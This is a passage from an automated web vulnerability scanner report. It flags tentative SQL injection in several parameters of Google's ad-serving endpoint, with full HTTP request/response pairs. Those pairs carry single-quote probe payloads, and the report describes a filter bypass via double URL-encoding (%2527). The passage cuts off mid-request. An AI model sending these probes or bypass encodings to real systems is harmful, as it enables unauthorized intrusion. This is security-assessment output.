GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 15:15:28 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2906

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...
or%2520attorneys%2522%26";
google_ad.visible_url = "PassagesMalibu.com";
google_ad.line1 = "Private Drug Rehab";
google_ad.line2 = "Non-12 Step Addiction Cure Center";
google_ad.line3 = "Known for Exceptional Cure Rate.";
google_ad.regionname = "";
google_ads[1] = google_ad;
google_info.feedback_url = "http://www.google.com/url?ct\x3dabg\x26q\x3dhttps://www.google.com/adsense/support/bin/request.py%3F
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 15:15:29 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3150

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...

1.6. http://googleads.g.doubleclick.net/pagead/ads [bih parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The bih parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the bih parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the bih request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010%2527&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 15:12:48 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3002

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...
tors%2522%26";
google_ad.visible_url = "PassagesMalibu.com";
google_ad.line1 = "Private Drug Rehab";
google_ad.line2 = "Integrated Holistic \x26amp; Cutting Edge";
google_ad.line3 = "Unique Rehab. Exceptional Success.";
google_ad.regionname = "";
google_ads[1] = google_ad;
google_info.feedback_url = "http://www.google.com/url?ct\x3dabg\x26q\x3dhttps://www.google.com/adsense/support/bin/request.py%3Fco
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010%2527%2527&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 15:12:49 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2774

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...

1.7. http://googleads.g.doubleclick.net/pagead/ads [ga_fc parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The ga_fc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ga_fc parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ga_fc request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1%2527&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 15:07:18 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2980

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...
tors%2522%26";
google_ad.visible_url = "PassagesMalibu.com";
google_ad.line1 = "Private Drug Rehab";
google_ad.line2 = "Integrated Holistic \x26amp; Cutting Edge";
google_ad.line3 = "Unique Rehab. Exceptional Success.";
google_ad.regionname = "";
google_ads[0] = google_ad;
google_ad = new Object();
google_ad.n = 2;
google_ad.type = "text";
google_ad.bidtype = "CPC";
google_ad.targeting_type = "con
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1%2527%2527&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 15:07:19 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3020

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...

1.8. http://googleads.g.doubleclick.net/pagead/ads [lmt parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The lmt parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lmt parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925'&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 14:58:54 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3031

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...
%2520treatment%26";
google_ad.visible_url = "PassagesMalibu.com";
google_ad.line1 = "Luxury Alcohol/Drug Rehab";
google_ad.line2 = "Non-12 Step Addiction Cure Center";
google_ad.line3 = "Known for Exceptional Cure Rate.";
google_ad.regionname = "";
google_ads[1] = google_ad;
google_info.feedback_url = "http://www.google.com/url?ct\x3dabg\x26q\x3dhttps://www.google.com/adsense/support/bin/request.py%3F
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925''&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 14:58:55 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2828

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...

1.9. http://googleads.g.doubleclick.net/pagead/ads [num_ads parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The num_ads parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the num_ads parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2'&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 14:59:07 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 23019

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...
26";
google_ad.visible_url = "PassagesMalibu.com";
google_ad.line1 = "Drug Treatment For Attorneys";
google_ad.line2 = "Integrated Holistic \x26amp; Cutting Edge";
google_ad.line3 = "Unique Rehab. Exceptional Success.";
google_ad.regionname = "";
google_ads[1] = google_ad;
google_ad = new Object();
google_ad.n = 3;
google_ad.type = "text";
google_ad.bidtype = "CPC";
google_ad.targeting_type = "con
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2''&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 14:59:09 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 22385

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...

1.10. http://googleads.g.doubleclick.net/pagead/ads [oe parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The oe parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the oe parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the oe request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8%2527&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
